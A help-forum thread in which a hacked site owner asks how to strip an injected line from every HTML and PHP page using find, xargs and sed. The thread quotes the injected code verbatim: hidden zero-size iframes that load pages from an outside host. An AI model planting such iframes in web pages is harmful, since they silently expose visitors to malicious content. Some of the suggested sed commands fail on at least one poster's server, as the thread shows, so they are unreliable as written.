• 0

SSH Find/Replace Command Line


Question

I just got SSH enabled on my server, I logged in using WinSCP. Is there a command line I can put to find and delete or find and replace a single line of code in ALL of my html and php pages?

This is the the line I need to delete (my account was hacked). I want to delete it if possible...

<iframe src="http://reycross.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://reycross.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://reycross.com/laso/s.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://reycross.com/laso/s.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Link to comment
Share on other sites

16 answers to this question

Recommended Posts

  • 0
Rudy,

My client doesn't have an option (on Windows) to find/replace.

kjordan2001

I am completely new to SSH so I'm not sure what do you mean by 'sed' ?

It's a commandline program.

# sed -i -e 's@test@test2@g' myfile

Would replace all instances (the g at the end for global) of test with test2 in myfile.

Link to comment
Share on other sites

  • 0

You could do something like have winscp open all your files in notepad++ (select the infected files, edit them, should open up in notepad++), then in notepad++ find and replace in all the files you've opened up. Save them, and they get uploaded

I am pretty winscp does that, and that would be one way

Link to comment
Share on other sites

  • 0

Hmm, Thing is I have over 6GB of data on the sever so downloading them all then re-uploading them is the last option I want to try.

kjordan, the program commandline you provided, does that work only for one file at a time or can it run through my entire directory/sub-directories and replace everything?

Link to comment
Share on other sites

  • 0

Sed will work on a single file by default but you can feed it the results of a find command to make it traverse entire drives if you want to.

Here's a demo video.

Command in question is:

find . -name "*.txt" | xargs sed -i .old -e "s/howdy/hello/g"

That'll swap out "howdy" with "hello" in all text files in the current directory and sub-directories.

it will store backups in place with .old extensions just in case things all go wrong too - probably a good idea because you're editing live on the server rather than using a version control system + push/pull updates.

Link to comment
Share on other sites

  • 0

evn,

The code you provided the quote has "s/howdy/hello/g" but what I want to replace has a back slash ( / ) in it (as mentioned above), would this still work? I believe the command line you mentioned would work for a single word but not for a long line of html code unless if I'm wrong.

Link to comment
Share on other sites

  • 0
Thanks, i'll give that a try.

Did you get it to work? I also got the same hack and all my .html files on my website had that string added to it. I ran a command to see all the files that were modified but I dont know how to run a command to have all those files fixed.

Link to comment
Share on other sites

  • 0

I am trying this command

find . -name "*.html" | xargs sed -i .old -e "s/\iframe src="http:\\reycross.com\lib\index.php\ width=0 height=0 style=\hidden\ frameborder=0 marginheight=0 marginwidth=0 scrolling=no\\\iframe>/./g"

This is whats been added to all my html files

<iframe src="http://reycross.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Is that code correct? I am not sure what I am doing

Link to comment
Share on other sites

  • 0

this following code worked

find . -name "*.html" | xargs sed -i .old -e "s/<iframe src=\"http:\/\/reycross.com\/lib\/index.php\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>/./g"

thanks for pointing me in the right direction.

Link to comment
Share on other sites

  • 0

I have to replace "motallyTrack($motally_params);" with "//motallyTrack($motally_params);"

in the "functions.php" file in all /var/www/html/ folders.

that is my command line:

find . -name "functions.php" | xargs sed -i .old -e "s/motallyTrack\(\$motally\_params\)/\/\/motallyTrack\(\$motally\_params\)/g"

I receive the following error msg:

sed: can't read .old: No such file or directory

sed: can't read ./oig_tmp/phpc/plugins/Page: No such file or directory

sed: can't read Counts.php: No such file or directory

sed: can't read ./oig_tmp/phpc/plugins/Browsers: No such file or directory

sed: can't read (Graphical).php: No such file or directory

Link to comment
Share on other sites

  • 0

you could use something like grep with find to search for all the files containing that string, probly need to use a complicated regex string tho :p

That's one huge regex Colin... by time you've worked that out you could've done it manually :p

Link to comment
Share on other sites

This topic is now closed to further replies.